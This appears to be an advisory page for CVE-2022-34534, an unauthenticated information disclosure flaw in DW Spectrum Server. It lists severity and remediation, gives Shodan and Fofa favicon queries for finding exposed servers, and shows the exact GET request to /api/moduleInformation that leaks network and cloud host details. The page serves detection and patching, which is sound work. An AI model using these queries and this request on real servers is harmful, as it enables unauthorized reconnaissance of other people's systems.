🔙 목록으로 돌아가기

CVE-2022-34534: Digital Watchdog DW Spectrum Server 4.2.0.32842 - Information Disclosure

TitleDigital Watchdog DW Spectrum Server 4.2.0.32842 - Information Disclosure
Authorritikchaddha
SeverityHigh
ImpactUnauthenticated attackers can access sensitive system information including network configuration, remote addresses, and cloud host details through the moduleInformation API endpoint, potentially facilitating further attacks.
RemediationUpdate Digital Watchdog DW Spectrum Server to a version newer than 4.2.0.32842 that requires authentication for the moduleInformation API endpoint.
CVSS Score7.5
EPSS Score0.28876
CVE IDCVE-2022-34534
CWE IDCWE-200
Shodan Queryhttp.favicon.hash:868509217http.favicon.hash:"868509217"
Fofa Queryicon_hash="868509217"
Tags cve cve2022 digital-watchdog dw spectrum exposure vuln

🔍 Vulnerability Description

Digital Watchdog DW Spectrum Server 4.2.0.32842 allows attackers to access sensitive infromation via a crafted API call.

🌐 HTTP Request

GET /api/moduleInformation HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-34534.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-34534.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A